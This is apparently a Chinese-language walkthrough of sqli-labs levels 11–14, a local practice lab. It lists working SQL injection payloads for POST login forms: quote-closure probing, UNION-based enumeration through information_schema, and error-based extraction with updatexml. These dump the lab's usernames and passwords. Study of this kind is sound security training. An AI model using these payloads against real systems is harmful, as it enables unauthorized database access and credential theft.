十一关
http://127.0.0.1/sqli/Less-11/
看到这个页面,添个admin,admin在说.
什么情况,竟然出现这个结果.那么在乱填一个.
明显不一样了.那么我还是抓包处理一下.
抓到包,我们可以尝试重发测试.
看到数据库报错,第一个时间想到这点有漏洞.
uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit #得知有2列数
uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit #得到数据库security
uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit #得到数据表emails,referers,uagents,users
uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit #得到数据表users的字段
user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password
uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit #数据表users的username和password的数据
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
第十二关
直接说这么找注入点和闭合点
uname=xxeyuki'&passwd=33yuki&submit=Submit #单引号没有任何反应
uname=xxeyuki"&passwd=33yuki&submit=Submit #有反应了,很明显的数据库报错。
")这闭合好像非常明显
uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit #3报错,2没有报错 确定列数2
uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit #得到数据库security
uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit #数据表 users
uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit #字段username,password
uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit #用户名和密码数据
十三关
uname=admin'&passwd=admin&submit=Submit #看到这个弹出这个我就大概确定闭合是')
ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1
uname=admin') order by 2#&passwd=admin&submit=Submit #确定列数为2
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据库
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据表
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit #爆字段,无语只能17个字符
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit #只能一个个爆了
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit #密码字段
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #用户名
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #用户名
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #密码
十四关
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据库
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit #爆数据表
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #爆用户名
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit #爆密码
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit